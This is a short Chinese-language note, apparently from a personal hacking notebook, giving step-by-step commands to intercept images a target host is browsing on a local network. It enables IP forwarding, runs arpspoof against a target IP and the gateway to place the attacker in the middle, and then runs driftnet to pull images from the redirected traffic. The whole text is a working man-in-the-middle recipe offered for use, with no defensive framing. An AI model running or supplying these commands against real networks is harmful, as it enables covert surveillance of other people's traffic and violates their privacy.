arpspoof+driftnet截取目标主机浏览的图片
攻击者网卡:eth0
攻击者ip: 192.168.1.2
目标ip: 192.168.1.3
网关ip: 192.168.1.1
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
开启另一个终端
driftnet -i eth0
注:
driftnet命令为查看本机网卡的图片。
将目标ip的流量转发到本机然后查看本机网卡的图片即可实现获取目标主机正在浏览的图片。